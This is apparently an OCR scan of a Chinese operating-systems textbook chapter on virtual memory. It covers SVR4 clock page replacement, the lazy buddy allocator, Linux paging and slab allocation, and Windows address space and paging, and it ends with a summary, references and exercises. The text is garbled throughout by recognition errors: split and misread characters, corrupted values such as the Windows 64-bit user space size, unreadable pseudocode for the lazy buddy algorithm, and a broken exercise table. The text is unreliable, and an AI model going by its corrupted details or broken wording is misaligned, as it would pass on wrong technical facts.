并 给 它 分 配 某 个 设备 中 的 页 面 用 于 交换 。 这 时 ， 操 作 系 
统 被 告知 在 首次 加 载 程序 或 数据 块 之 前 是 否 需 要 清空 
该 页 框 中 的 单元 ( 置 为 0 )。 
页 面 置 换 i 

页 框 数据 表 用 于 页 面 置换 。 在 该 表 中 ， 有 许多 指针 
用 于 创建 各 种 列表 。 所 有 可 用 页 框 被 链接 在 一 起 ， 构 成 


一 个 可 用 于 读 取 页 的 空闲 页 框 链表 。 当 可 用 页 的 数目 减 


DBS BAL FA, 内 核 将 “窃取 ”一 些 页 作为 补偿 。 

SVR4 中 使 用 的 页 面 置 换算 法 是 时 钟 策略 ( 如 图 
8.16 所 示 ) 的 一 种 改进 算法 ， 称 做 双 表 针 时 钟 算法 〈 如 
图 8.23 所 示 )。 该 算法 为 内 存 中 的 每 个 可 被 换 出 的 页 


EN 页 列表 的 开始 


扫描 窗口 





图 8.23 ” 双 表 针 时 钟 页 面 置换 算法 


(未 被 锁定 ) 在 页 表 项 中 设置 访问 位 。 当 该 页 第 一 次 被 读 取 时 ， 该 位 被 置 为 0; 当 该 页 被 访问 进 
行 读 或 写 时 ， 这 人 一 位 被 于 为 1。 时 钟 算法 中 的 前 指针 ， 扫 描 可 被 换 出 责 列表 中 的 页 ， 并 把 第 一 页 
的 访问 位 设置 成 0。 一 段 时 间 后 ， 后 指针 扫描 同一 个 表 并 检查 访问 位 。 如 果 该 位 被 于 为 1， 则 表 
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明 从 前 指针 扫描 过 以 后 该 页 曾经 被 访问 过 ， 从 而 这 些 页 框 被 略 过 。 如 果 该 位 仍然 被 置 为 0， 则 说 
明 在 前 指针 和 后 指针 访问 之 间 的 时 间 间 隔 中 该 页 未 被 访问 过 ,这 些 页 被 放置 在 准备 置换 出 页 的 列 
表 中 。 

确定 该 算法 的 操作 需要 两 个 参数 

o 扫描 速度 〈 scanrate ): 两 指针 扫描 页 表 的 速度 ， 单 位 为 页 / 秒 。 

@ 扫描 窗口 ( handspread ): 前 指针 和 后 指针 之 间 的 间隔 。 

在 引导 期 间 , 需要 根据 物理 内 存 的 总 量 为 这 两 个 参数 设置 默认 值 。 扫描 速度 可 以 改变 ,以 满 
足 变化 的 条 件 。 当 空闲 存储 空间 的 总 量 在 lotsfree 和 minfree 两 个 值 之 间 变 化 时 ， 这 个 参数 在 最 
慢 扫描 速度 和 最 快 扫描 速度 (在 配置 时 设置 ) 之 间 线 性 变化 。 即 当空 闲 存 储 空间 缩小 时 ,这 两 个 
针 移动 速度 加 快 以 释放 更 多 的 页 。 扫描 窗口 参数 确定 前 指针 和 后 指针 之 间 的 间隔 。 因 此 , 它 和 扫 
描 速度 一 起 ， 确 定 了 一 个 由 于 很 少 使 用 而 被 换 出 的 页 在 被 换 出 之 前 被 使 用 的 机 会 窗口 。 


8.3.2 内核 内 存 分 配器 


内 核 在 执行 期 间 频繁 地 产生 和 销毁 一 些小 表 和 缓冲 区 ,每 一 次 产生 和 销 筑 操作 都 需要 动态 地 
分 配 内 存 。[ VAHA96 ] 给 出 了 以 下 例子 : 

© 路 径 名 转换 过 程 可 能 需要 分 配 一 个 缓冲 区 ， 用 于 从 用 户 空间 复制 路 径 名 。 

© allocb () 例 程 分 配 任意 大 小 的 STREAMS 缓冲 区 。 

@ 许多 UNIX 实现 分 配 僵尸 结构 用 于 保留 退出 状态 和 已 故 进 程 的 资源 使 用 信息 。 

© 在 SVR4 fil Solaris F, 内 核 在 需要 时 动态 地 分 配 许多 对 象 (如 proc 结构 、vnodes 和 文件 

描述 符 块 )。 

这 些 块 中 大 多 数 都 小 于 典型 的 机 器 页 尺寸 ， 因 此 分 页 机 制 对 动态 内 核 内 存 分 配 是 低 效 的 。 
SVR4 使 用 修改 后 的 伙伴 系统 ， 详 见 7.2 节 。 

在 伙伴 系统 中 ， 分 配 和 释放 一 块 存储 空间 的 成 本 比 最 佳 适 配 和 首次 适 配 策略 [KNUT97 ] 都 
要 低 。 但 是 ， 对 于 内 核 内 存 管 理 的 情况 ， 分 配 和 释放 操作 必须 尽 可 能 地 快 。 伙 伴 系统 的 缺点 是 分 
裂 和 合并 都 需要 时 间 。 

AT&T 的 Barkley 和 Lee 提出 了 伙伴 系统 的 一 种 变 体 , 称 做 懒惰 伙伴 系统 ( lazy buddy system ) 
[ BARK89 ]， 它 被 SVR4 采用 。 作 者 观察 到 UNIX 在 内 存 请 求 中 常常 表现 出 稳定 状态 的 特征 ， 也 
就 是 说 , 对 某 一 特定 大 小 的 块 的 请 求 总 量 在 一 段 时 间 内 变化 很 慢 。 因 此 ,如果 释 放 了 一 个 大 小 为 
2 的 块 ， 并 且 立 即 与 它 的 伙伴 合并 成 一 个 大 小 为 2*! 的 块 ， 则 内 核 下 一 次 需要 的 可 能 还 是 大 小 为 
2 的 块 ， 这 就 又 需要 再 次 分 裂 这 个 大 块 。 为 避免 这 种 不 必要 的 合并 与 分 烈 ， 懒 惰 伙 伴 系统 推迟 进 
行 合 并 的 工作 ， 直 到 它 看 上 去 需要 合并 时 ， 再 合并 尽 可 能 多 的 块 。 

懒惰 伙伴 系统 使 用 以 下 参数 : 

N: 当前 大 小 为 2 的 块 的 数目 。 

A: 当前 大 小 2 并且 已 被 分 配 (被 占据 ) 的 块 的 数目 。 

G: 当前 大 小 为 2 并且 全 局 空闲 的 块 的 数目 ; 这 些 块 是 可 以 合法 合并 的 ; 如 果 这 样 一 个 块 的 
伙伴 变 成 全 局 空闲 的 ， 则 两 个 块 可 以 合并 成 一 个 大 小 为 2"! 的 全 局 空闲 块 。 在 标准 伙伴 
系统 中 ， 所 有 的 空闲 块 (“Hd”) 都 可 以 看 做 是 全 局 空闲 的 。 
当前 大 小 为 2 并 且 局 部 空闲 的 块 的 数目 ; 这 些 块 是 不 可 以 合并 的 。 即 使 这 类 块 的 伙伴 变 成 空 
闲 的 ， 这 两 个 块 仍然 不 能 合并 。 相 反 ， 为 了 将 来 请 求 该 大 小 的 块 ， 局 部 空闲 块 被 保留 起 来 。 
这 些 参数 保持 以 下 关系 : 


Li: 


N= A; +G; + Li 
总 体 上 看 , 懒惰 伙伴 系统 试图 维护 一 系列 局 部 空闲 块 , 只 有 当局 部 空闲 块 的 数目 超过 了 阔 值 
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才 进 行 合并 。 如 果 有 过 多 的 局 部 空闲 块 ， 就 有 可 能 出 现 当 满 足下 一 次 请 求 时 缺少 空闲 块 的 情况 。 
大 多 数 时候 ， 当 一 个 块 被 释放 后 ， 并 不 立即 合并 , 因此 有 一 个 很 小 的 记录 和 操作 代价 。 当 分 配 一 


个 块 时 ， 局 部 空闲 块 和 全 局 空闲 块 是 没有 区 别 的 。 


合并 的 条 件 是 给 定 大 小 的 空闲 块 数目 超 过 了 该 大 小 的 已 分 配 块 的 数目 〈 也 就 是 说 ， 必 须 有 
LSA) 为 了 限制 局 部 空闲 块 的 增长 ， 这 是 一 个 很 合理 的 原则 , 并且 [BARK89 ] 中 的 实验 证 明 


该 方案 带 来 了 显著 的 成 本 节省 。 
为 实现 这 个 方案 ， 作 者 定义 了 一 个 延迟 变量 : 


Di; = Ar Li = N,-2L,-G; 


图 8.24 显示 了 这 个 算法 。 


Di 的 初始 值 为 0 
在 一 次 操作 后 ， 疡 的 值 做 如 下 更 新 ， 


(I) 直下 一 个 操作 是 一 个 块 分 配 请 求 : 
让 存在 自由 块 ， 选 择 一 个 分 配 
让 选择 的 块 是 局 部 空闲 的 
then D;:=D;+2 
else Di:=D;+ 1 


otherwise 
首先 通过 把 一 个 大 块 分 裂 成 两 个 获得 两 个 块 (递归 操作 》 
分 配 一 块 ， 并 把 另 一 块 标记 成 局 部 空闲 的 
DD; 保 持 不 变 《 但 由 于 递归 调用 ，D 可 能 变 成 别 的 块 大 小 》 


CID 让 下 一 个 操作 是 一 个 块 释放 请 求 
Case Dj =2 


把 它 标 记 成 全 局 空闲 的 ， 并 且 全 局 地 释放 它 


Di:=D:2 
Case D=1 


HERICKe AZ AN, HEERKE: 


Di:=0 
Case D=0 


HEPAKEASAM, HRSA RE, RAT AERIS He 
选择 一 个 大 小 为 2 的 局 部 空闲 块 ， 并 全 局 地 释放 它 ; 





D,:=0 


图 8.24 BRK TERR 


8.4 Linux 内 存 管 理 


Linux 具有 其 他 UNIX 实现 版 本 中 内 存 管理 方案 的 许多 特征 ， 但 它 具 有 自己 独特 的 特点 。 总 
体 来 说 ，Linux 内 存 管理 方案 非常 复杂 [ DUBE98 |， 这 里 就 Linux 内 存 管理 的 两 个 主要 特征 ( 进 


程 虚拟 内 存 和 内 核 内 存 分 配 ) 给 出 简单 的 概述 。 


8.4.1 Linux 虚拟 内 存 
虚拟 内 存 寻 址 


Linux 使 用 三 级 页 表 结 构 ， 由 下 面 几 种 类 型 的 表 组 成 〈 每 个 表 的 大 小 都 是 一 页 ): 

@ 页 目录 : 一 个 活动 进程 有 一 个 页 目录 ， 页 目录 为 一 页 尺寸 。 页 目录 中 的 每 一 项 指向 页 中 
间 目 录 中 的 一 页 。 每 个 活动 进程 的 页 目录 都 必须 在 内 存 中 。 

@ 页 中 间 目 录 : 页 中 间 目 录 可 能 跨越 多 个 页 。 页 中 间 目 录 中 的 每 一 项 指向 页 表 中 的 一 页 。 

o 页 表 : 页 表 也 可 以 跨越 多 个 页 。 每 个 页 表 项 指向 该 进程 的 一 个 虚拟 页 。 

为 使 用 这 个 三 级 页 表 结 构 ，Linux 中 的 虚拟 地 址 被 看 做 是 由 4 ARAR, WE 8.25 所 示 。 最 
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靠 左 也 最 重要 的 域 作为 页 目录 的 索引 , 接 下 来 的 域 作为 页 中 间 目 录 的 索引 , 第 三 个 域 作 为 页 表 的 
索引 ， 第 四 个 域 给 出 在 内 存 中 被 选中 页 中 的 偏 移 量 。 





图 8.25 Linux 虚拟 内 存 方案 的 地 址 转换 


Linux 页 表 结 构 是 与 平台 无 关 的 ， 并且 设计 成 适用 于 提供 对 三 级 分 页 的 硬件 支持 的 64 位 
Alpha 处 理 器 。 对 于 64 位 地 址 ， 如 果 在 Alpha 中 只 使 用 两 级 页 ， 可 能 会 导致 非常 庞大 的 页 表 和 
目录 。32 位 的 Pentium/x86 体系 统 结构 有 两 级 硬件 分 页 机 制 。Linux 软件 通过 把 页 中 间 目 录 的 大 
小 定义 成 1 来 适应 这 种 两 级 方案 。 由 于 对 额外 分 级 的 所 有 访问 是 在 编译 时 而 不 是 在 执行 时 被 优 
化 的 。 因 此 ， 在 只 支持 两 级 页 的 硬件 中 使 用 通常 的 三 级 设计 并 没有 额外 的 性 能 开销 。 

页 分 配 

为 提高 往 内 存 中 读 和 人 和 从 内 存 中 写 出 页 的 效率 ，Linux 定义 了 一 种 机 制 ， 用 于 把 连续 的 页 映 
射 到 连续 的 页 框 中 。 基于 这 个 目的 , 它 使 用 了 伙伴 系统 。 内 核 维护 一 系列 大 小 固定 的 连续 页 框 组 ， 
一 组 可 以 包含 1、2、4、8、16 或 32 个 页 框 。 当 一 页 在 内 存 中 被 分 配 或 被 解除 分 配 时 ,可 用 的 组 
使 用 伙伴 算法 被 分 裂 或 合并 。 

页 面 置 换算 法 

Linux 页 面 置 换算 法 基于 8.2 节 描 述 的 时 钟 算法 〈 如 图 8.16 所 示 )。 在 简单 的 时 钟 算法 中 ， 
内 存 中 的 每 一 页 都 有 一 个 使 用 位 和 一 个 修改 位 与 之 相关 联 。 在 Linux 方案 中 , 使 用 位 被 一 个 8 位 
的 age 变量 所 取代 。 每 当 一 页 被 访问 时 ，age 变量 增 1。 在 后 台 ，Linux 周期 性 地 扫描 全 局 页 池 ， 
并 且 当 它 在 内 存 中 的 所 有 页 间 循 环 时 ， 将 扫描 的 每 一 页 的 age 变量 减 1。age 为 0 的 页 是 一 个 
“ 旧 ” 页 ， 有 较 长 一 段 时 间 未 被 访问 过 ， 是 用 于 置换 的 最 佳 候选 页 。age 的 值 越 大 ， 该 页 最 近 被 
使 用 的 频率 越 高 ， 从 而 越 不 适合 于 置换 。 因 此 ，Linux 算法 是 一 种 基于 最 少 使 用 频率 的 策略 。 


8.4.2 内核 内 存 分 配 


Linux 内 核 内 存 管 理 物理 内 存 页 框 ， 它 主要 的 功能 是 为 特定 的 使 用 分 配 和 回收 页 框 。 页 框 的 
可 能 拥有 者 包括 用 户 空间 进程 ( 即 页 框 是 某 个 进程 的 虚拟 内 存 当前 驻 留 在 实 存 中 的 一 部 分 )、 动 
态 分 配 的 内 核 数据 、 静 态 内 核 代 码 以 及 页 高 速 缓存 9。 

Linux 内 核 内 存 分 配 的 基础 是 用 于 用 户 虚拟 内 存 管 理 的 页 分 配 机 制 。 在 虚拟 内 存 方 案 中 ,使 
用 伙伴 算法 可 以 以 一 页 或 多 页 为 单位 , 给 内 核 分 配 或 回收 存储 空间 。 由 于 按 这 种 方式 可 以 分 配 的 
内 存 最 小 量 为 一 页 ， 因 而 页 分 配 程序 可 能 由 于 内 核 需 要 小 的 占 奇 数 页 面 的 短 寿 命 内 存 而 效率 很 低 。 


O ”页 高 速 缓存 具有 与 本 章 介绍 的 磁 扒 缓冲 以 及 将 在 第 11 章 介 绍 的 磁盘 高 速 缓存 类 似 的 属性。 在 第 . 11 章 将 详细 
讨论 Linux 页 高 速 缓存 。 
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为 适应 这 些小 块 ，Linux 在 分 配 页 时 使 用 一 种 称 为 slab 分 配 的 方案 [ BONW94 ]。 在 Pentium/x86 机 
器 上 ， 页 尺寸 为 4KB， 小 于 一 页 的 块 可 以 被 分 配给 32、64、128、252、508、2040 和 4080 个 字 节 。 

slab 分 配 程 序 相 对 比较 复杂 ， 这 里 不 再 详细 分 析 ，[ VAHA96 ] 中 有 关于 它 的 详细 描述 。 实 
BRE, Linux 维护 了 一 组 链表 ， 每 种 块 大 小 对 应 一 个 链表 。 块 可 以 按照 类 似 于 伙伴 算法 的 方式 分 


裂 或 合并 ， 并 且 可 以 在 链表 间 移 动 。 


8.5 Windows 内 存 管 理 


Windows 虚拟 内 存 管理 程序 控制 如 何 分 配 内 存 以 及 如 何 执行 分 页 。 内 存 管 理 程序 设计 成 可 
以 在 各 种 平台 上 执行 , 并 且 使 用 的 页 尺寸 可 以 从 4KB 一 直到 64KB, Intel 和 AMD64 平台 每 页 有 
4096 个 字 节 ， 而 Intel Itanium 平台 每 页 有 8192 个 字 节 。 





Windows 和 Linux 的 比较 


Windows 


根据 需要 ， 将 物理 内 存 动态 映射 到 内 核 地 址 空间 


基于 TLB 效率 的 考虑 ， 内 核 和 应 用 程序 可 以 使 用 x86 
的 大 尺寸 页 面 

大 多 数 内 核 和 驱动 程序 的 代码 和 数据 是 可 换 页 的 ; 系统 
引导 后 会 删除 初始 化 代码 ; 所 有 页 表 是 可 换 页 的 

用 户 态 虚拟 地 址 空间 的 映射 和 以 物理 对 象 ( 包括 文件 、 
设备 、 物 理 内 存 ) 的 视角 分 配 地 址 空间 的 操作 是 分 离 的 
物理 内 存 可 以 通过 地 址 窗口 扩展 ( Address Windowing 
Extension, AWE) 技术 在 大 应 用 程序 中 进行 高 效 的 申请 ， 
映射 和 管理 

支持 写 时 复制 


地 址 空间 默认 按照 2GB/2GB 的 大 小 分 配给 用 户 态 和 内 
核 态 ; Windows 在 启动 时 可 以 设置 为 3GB/1GB 分 配 


高 速 缓存 管理 器 将 文件 映射 到 内 核 地 址 空间 , 通过 呀 存 
管理 器 对 页 面 进行 实际 的 分 配 等 操作 

线程 可 以 不 经 过 缓存 管理 器 ， 直 接 进行 IO 操作 

页 框 号 ( Page Frame Number, PFN ) 数据 属于 核心 数据 
结构 ; 所 有 使 用 PFN 标识 的 页 面 ， 或 者 属于 某 一 个 进程 ， 
或 者 在 如 下 页 列表 之 一 中 : WA. CB. SAL MH 
块 对 象 描 述 了 可 分 配 的 内 存 对 象 , 不仅 限于 文件 , 还 包 
括 被 换 出 后 按 需 创建 的 页 表 , 以 及 正在 被 换 人 的 缺 页 页 面 
无 论 是 用 户 进程 还 是 内 核 态 系统 进程 , 页 面 置换 算法 都 
是 基于 工作 集 的 

具有 加 密 页 文件 、 释 放 内 存 时 清 零 页 面 等 安全 特性 
按 需 申请 页 面 文件 空间 , 使 得 写 操作 可 以 局 限于 正 要 被 
释放 的 一 组 页 面 中 ; 通过 和 块 对 象 对 应 的 页 表 间 接 指向 ， 
实现 共享 页 面 , 故 被 换 入 的 共享 页 面 使 用 的 页 面 文件 空间 
可 以 被 立即 释放 


Linux 
最 多 有 896M 物理 内 存 被 直接 映射 到 内 核 地 址 空间 
(32 位 系统 中 )， 剩 余 物 理 内 存 被 动态 地 上 映射 到 固定 的 
128M 内 核 地 址 空间 中 ， 并 且 可 以 不 连续 映射 


内 核 是 不 可 换 页 的 ; 模块 是 不 可 换 页 但 是 可 印 载 的 


用 户 态 地 址 空间 直接 分 配给 物理 对 象 


支持 写 时 复制 

地 址 空间 默认 按照 3GB/1GB 的 大 小 分 配给 用 户 态 和 
内 核 态 ; Linux 可 以 在 单独 的 地 址 空间 中 运行 内 核 态 和 
用 户 态 代码 ， 给 予 用 户 程序 整个 4GB 的 地 址 空间 

页 缓存 器 实现 了 对 页 面 的 缓存 ， 同 时 作为 换 页 系统 的 
旁 视 缓存 

进程 可 以 不 经 过 页 缓存 器 ， 直 接 进 行 WO 操作 


页 缓存 器 对 所 有 不 在 进程 中 的 页 面 进行 管理 


磁盘 缓冲 器 负责 管理 对 一 个 页 面 的 多 次 缺 页 中 断 的 
处 理 


页 面 置 换算 法 为 全 局 时 钟 算法 


按 需 申请 交换 空间 ， 使 得 写 操作 可 以 局 限于 正 要 被 释 
放 的 一 组 页 面 中 ; 被 共享 的 页 面 需 要 一 直 保存 在 交换 空 
间 中 ， 直 到 所 有 拥有 该 页 面 的 进程 均 已 将 这 一 页 面 痪 人 
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8.5.1 Windows 虚拟 地 址 映射 


在 32 位 系统 ， 每 个 Windows 用 户 进程 看 到 的 是 一 个 独立 的 32 位 地 址 空间 ， 每 个 进程 允许 
4GB 的 存储 空间 。 一 部 分 存储 空间 默认 为 操作 系统 保留 ， 因 而 每 个 用 户 实际 上 有 2GB 的 可 用 点 
拟 地 址 空间 , 所 有 进程 共享 同一 个 2GB 的 系统 空间 。 有 一 个 选项 可 以 允许 用 户 空间 增加 到 3GB， 
只 留 下 1GB 用 作 系 统 空间 。Windows 文档 表明 这 个 功能 是 为 了 支持 具有 多 个 GB 的 RAM 的 服 
务 器 上 运行 的 、 对 内 存 要 求 非常 高 的 应 用 程序 , 并 且 使 用 大 地 址 空间 可 以 大 幅度 地 提高 应 用 程序 
的 性 能 ， 例 如 决策 支持 或 者 数据 挖 据 。 
l 图 8.26 给 出 了 用 户 进 程 看 到 的 默认 的 虚拟 地 址 空间 。 它 由 四 个 区 域 组 成 : 

64KB 的 区 域 ， AF OZ, 

指针 赋值 〈 不 可 访问 ) | 
2GB 的 用 户 地 址 空间 
〈 未 保留 ， 可 使 用 ) 


64KB 的 区 域 ， 用 于 坏 
指针 赋值 (不 可 访问 ) 





省 | 2GB 的 区 域 ， 用 于 操 
作 系 统 ( 不 可 访问 》 








OxFFFFFFFF 
图 8.26 ”Windows 默认 的 32 位 虚拟 地 址 空间 


© 0x00000000 到 0x0000FFFF: 留 出 来 用 于 帮助 程序 员 捕 获 空 指针 赋值 。 

© 0x00010000 到 Ox7FFEFFFF: 可 以 使 用 的 用 户 地 址 空间 。 这 个 空间 被 划分 成 页 ， 可 以 装 
入 内 存 。 

@ 0x7FFF0000 到 Ox7FFFFFFF: 用 户 不 能 访问 的 保护 页 。 这 个 页 使 得 操作 系统 可 以 很 容易 
地 检查 出 越界 指针 的 访问 。 

© 0x80000000 到 OxFFFFFFFF: 系统 地 址 空间 。 这 个 2GB 的 进程 用 于 Windows 执行 程序 、 
内 核 和 设备 驱动 程序 。 

在 64 位 平台 上 ，Windows Vista 允许 用 户 地 址 空间 达到 STB. 


8.5.2 Windows 分 页 


当 一 个 进程 被 创建 后 ， 原 则 上 它 可 以 使 用 整个 2GB 的 用 户 空间 。 这 个 空间 划分 成 固定 大 小 
的 页 , 每 个 页 都 可 以 被 读 人 内 存 , 操作 系统 以 64KB 为 界 在 分 配 的 相 邻 的 区 域 管理 这 些 页 。 一 个 
页 可 以 处 于 以 下 三 种 状态 之 一 : 
e 可 用 : 当前 未 被 进程 使 用 的 地 址 。 
© RE: 虚拟 内 存 管理 器 为 一 个 进程 保留 的 地 址 ， 这 些 地 址 不 能 分 配给 其 他 进程 使 用 ( 如 
为 一 个 栈 保 留 空间 以 便 应 对 其 增长 ) | 
o 提交 : 虚拟 内 存 管理 器 为 进程 初始 化 地 址 空间 ， 以 便 访问 虚拟 内 存 页 。 这 些 页 可 以 在 磁 
盘 中 或 者 物理 内 存 中 保留 。 在 磁盘 上 时 ， 它 们 可 以 按照 文件 (映射 的 页 ) 形式 保存 ,或 
者 在 页 面 文件 中 保存 ( 例如 ， 当 它们 从 内 存 中 被 移出 时 写 人 页 的 磁盘 文件 )。 
区 分 保留 的 存储 空间 和 提交 的 存储 空间 是 很 有 用 的 , 因为 它 将 系统 总 共 所 需要 的 虚拟 内 存 
缩减 到 最 小 , 也 可 以 使 页 面 文件 变 小 ; 它 允 许 程序 保留 地 址 空间 ,即使 这 块 地 址 空间 还 不 能 被 该 
程序 访问 或 者 可 用 资源 配额 已 经 装 满 。 
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Windows 使 用 的 是 可 变 分 配 、 局 部 范围 的 ( 见 表 8.5 ) 驻 留 集合 管理 方案 。 当 一 个 进程 第 一 
次 被 激活 时 ， 就 给 它 分 配 一 个 数据 结构 以 便 管理 其 工作 集 。 当 进程 所 需 的 页 已 经 放 入 物理 内 存 ， 
内 存 管理 器 使 用 这 个 数据 结构 来 记录 分 配给 进程 的 页 面 。 活动 进程 的 工作 集 可 以 使 用 下 面 通用 
的 约束 进行 调整 : 
e 当 内 存 空间 很 充裕 时 ， 虚 拟 内 存 管 理 程序 允许 活动 进程 的 驻 留 集 增长 。 为 实现 这 一 点 ， 
当 发 生 缺 页 中 断 时 ， 一 个 新 页 被 读 人 内 存 ， 但 是 旧 页 却 不 换 出 ， 从 而 该 进程 的 驻 留 集 增 
加 一 页 。 

e 当 内 存 空间 很 缺乏 时 ， 虚 拟 内 存 管 理 程序 通过 把 最 近 很 少 使 用 的 页 移出 活动 进程 的 驻 留 
集 ， 从 而 缩减 那些 驻 留 集 的 大 小 ， 为 系统 回收 内 存 空 间 。 


8.6 小结 


为 了 有 效 地 使 用 处 理 器 和 IO 设备 , 希望 能 在 内 存 中 保留 尽 可 能 多 的 进程 。 此 外 ,还 希望 能 
解除 程序 在 开发 时 对 程序 使 用 内 存 大 小 的 限制 。 

解决 这 两 个 问题 的 途径 是 虚拟 内 存 技术 。 通 过 虚拟 内 存 技术 ,所 有 的 地 址 访问 都 是 逻辑 访 
问 ， 在 运行 时 转换 成 实地 址 。 这 就 允许 一 个 进程 位 于 内 存 中 的 任何 地 址 ， 并 且 这 个 位 置 可 以 随 
着 时 间 而 变化 。 虚 拟 内 存 技术 还 允许 一 个 进程 被 划分 成 块 。 在 执行 期 间 , 这 些 块 在 内 存 中 不 需要 
一 定 是 连续 的 ， 甚 至 在 运行 时 不 需要 该 进程 的 所 有 块 都 在 内 存 中 。 | 

支持 虚拟 内 存 技术 的 两 种 基本 方法 是 分 页 和 分 段 。 对 于 分 页 , 每 个 进程 划分 成 相对 比较 小 且 
大 小 固定 的 页 , 而 在 分 段 中 可 以 使 用 大 小 可 变 的 块 。 还 可 以 把 分 页 和 分 段 组 合 在 一 个 内 存 管理 方 
案 中 。 

虚拟 内 存 管理 方案 要 求 硬件 和 软件 的 支持 。 硬 件 支 持 由 处 理 器 提供 , 包括 把 虚拟 地 址 动态 转 
换 成 物理 地 址 , 当 被 访问 的 页 或 段 不 在 内 存 中 时 产生 一 个 中 断 。 这 类 中 断 触发 操作 系统 中 的 内 存 
管理 软件 。 

与 操作 系统 对 内 存 管 理 的 支持 相关 的 设计 问题 有 : 

o 读 取 策略 : 进程 页 可 以 在 请 求 时 读 取 ， 或 者 使 用 预先 分 页 策略 ， 使 用 艇 的 方式 一 次 读 取 

许多 页 。 

© 放置 策略 :对 纯粹 的 分 段 系统 ， 读 取 的 段 必须 匹配 内 存 中 的 可 用 空间 。 
BRAM: 当 内 存 装 满 后 ,必须 决 定 置换 哪个 页 或 哪些 页 。 
o 驻 留 集 管理 : 当 换 人 一 个 特定 的 进程 时 ， 操 作 系统 必 须 决定 给 该 进程 分 配 多 少 内 存 。 这 

既 可 以 在 进程 创建 时 静态 分 配 ， 也 可 以 动态 地 变化 。 
o 清除 策略 : 修改 过 的 进程 页 可 以 在 置换 时 被 写 出 ， 或 者 使 用 预约 式 清除 策略 ， 使 用 艇 的 

方式 一 次 写 出 许多 页 。 
o WRH: 加 载 控制 关注 的 是 在 任何 给 定 的 时 刻 ， 驻 留 在 内 存 中 的 进程 数目 。 


8.7 ”推荐 读物 和 网 站 


虚拟 内 存在 大 部 分 操作 系统 书籍 中 都 占据 了 大 量 的 篇 幅 。[ MILE92 ] 提供 了 关于 各 个 研究 领域 的 很 好 
的 总 结 ; [ CARR84 ] 深入 分 析 了 性 能 问题 ; 经 典 论文 [ DENN70 | 仍然 值得 一 读 ; [ DOWD93 ] 提供 了 关于 
各 种 页 面 置 换算 法 的 一 个 指导 性 的 性 能 分 析 ; [ JACO98a ] 很 好 地 总 结 了 当前 虚拟 内 存 的 设计 问题 ; 
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[ JACO98b ] 考察 了 多 种 微 处 理 器 中 的 虚拟 内 存 的 硬件 组 织 。 


[ IBM86 ] 非常 中 立地 说 明了 在 优化 虚拟 内 存 策略 MVS 时 ， 站 点 管理 员 可 以 使 用 的 工具 和 选项 ,非常 


值得 一 读 。 该 文档 阐述 了 问题 的 复杂 度 。 


[ VAHA96 ] 是 对 于 各 种 UNIX 中 使 用 的 内 存 管理 方案 的 最 佳 总 结 。[GORM04] 深入 分 析 了 Linux 内 存 管理 。 

CARRS84 Carr, R. Virtual Memory Management. Ann Arbor, MI: UMI Research Press 1984. 

DENN70 Denning, P. “Virtual Memory. ” Computing Surveys, September 1970. 

DOWDS93 Dowdy, L., and Lowery, C. P.S. to Operating Systems. Upper Saddle River, NJ: Prentice Hall, 1993. 

GORM04 Gorman, M. Understanding the Linux Virtual Memory Manager. Upper Saddle River, NJ: Prentice 
Hall, 2004. 

IBM86 IBM National Technical Support, Large Systems. Multiple Virtual Storage (MVS) Virtual Storage Tuning 

Cookbook. Dallas Systems Center Technical Bulletin G320-0597, June 1986. 

JACO98a Jacob, B., and Mudge, T. “Virtual Memory: Issues of Implementation. ” Computer, June 1998. 

JACO98b Jacob, B., and Mudge, T. “Virtual Memory in Contemporary Microprocessors.” IEEE Micro, 
August 1998. 

MILE92 Milenkovic, M. Operating Systems: Concepts and Design. New York: McGraw-Hill, 1992. 

VAHA96 Vahalia, U. UNIX Internals: The New Frontiers. Upper Saddle River, NJ: Prentice Hall, 1996. 


推荐 网 站 


© The Memory Management Reference ( www.memorymanagement.org): 包含 了 关于 内 存 管理 的 
所 有 特征 的 多 个 文档 和 链接 。 


8.8 关键 术语 、 复 习题 和 习题 





关键 术语 
关联 映射 内 部 碎片 分 页 分 段 
请 求 分 页 局 部 性 预先 分 页 slab 分 配 
外 部 碎片 页 实在 抖动 
读 取 策略 缺 页 中 断 驻 留 集 转换 检测 缓冲 区 
页 框 页 放置 策略 驻 留 集 管理 虚拟 内 存 
散 列表 页 面 置换 策略 段 工作 集 
散 列 法 页 表 段 表 
复习 题 
8.1 简单 分 页 与 虚拟 内 存 分 页 有 什么 区 别 ? 


8.2 
8.3 
8.4 
8.5 
8.6 
8.7 
8.8 
8.9 


解释 什么 是 抖动 。 

六 什么 在 使 用 虚拟 内 存 时 ， 局 部 性 原理 是 至 关 重 要 的 ? 

哪些 元 素 是 页 表 项 中 可 以 上 典型 找到 的 元 素 ? 简单 定义 每 个 元 素 。 
转换 检测 缓冲 区 的 目的 是 什么 ? 

简单 定义 两 种 可 供 选 择 的 页 面 读 取 策略 。 

驻 留 集 管理 和 页 面 置 换 策略 有 什么 区 别 ? 

FIFO 和 CLOCK 页 面 置换 算法 有 什么 联系 ? 

页 缓冲 实现 的 是 什么 ? 


8.10 ”为 什么 不 可 能 把 全 局 置换 策略 和 固定 分 配 策略 组 合 起 来 ? 


8.11 


驻 留 集 和 工作 和 集 有 什么 区 别 ? 


8.12 ”请 求 式 清除 和 预约 式 清除 有 什么 区 别 ? 
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习题 


8.1 


8.2 


8.3 


8.4 


8.5 


考虑 这 样 一 个 系统 ， 该 系统 用 3 位 表示 页 面 编号 , 用 5 位 表示 偏 移 量 。 在 该 系统 中 内 存 以 字 节 为 单位 
进行 存 取 。 现 在 假设 一 个 进程 有 6 页 ， 其 页 表 如 下 : 


有 效 位 页 框 号 修改 位 
1 4 1 


o o- >o m. 


7 
1 
0 
2 
1 


o o- o o 


在 下 面 的 问题 中 ， 如 果 发 生 页 面 失效 而 不 进行 处 理 。 

a) 虚拟 地 址 158 进行 物理 地 址 转换 后 是 多 少 ? 

b) 虚拟 地 址 53 进行 物理 地 址 转换 后 是 多 少 ? 

c) 虚拟 地 址 195 进行 物理 地 址 转换 后 是 多 少 ? 

考虑 一 个 使 用 32 位 的 地 址 和 1KB 大 小 的 页 的 分 页 虚拟 内 存 系 统 。 每 个 页 表 项 需要 32 位 。 需 要 限制 

页 表 的 大 小 为 一 个 页 。 

a) 页 表 一 共 需 要 使 用 几 级 ? 

b ) 每 一 级 页 表 的 大 小 是 多 少 ? 提示 : 一 个 页 表 的 大 小 比较 小 。 

c) 在 第 一 级 使 用 的 页 较 小 与 在 最 底下 一 级 使 用 的 页 较 小 相 比 ， 那 种 策略 使 用 最 小 个 数 的 页 ? 

a) 图 8.4 中 的 用 户 页 家 中 需要 多 少 内 存 空间 ? 

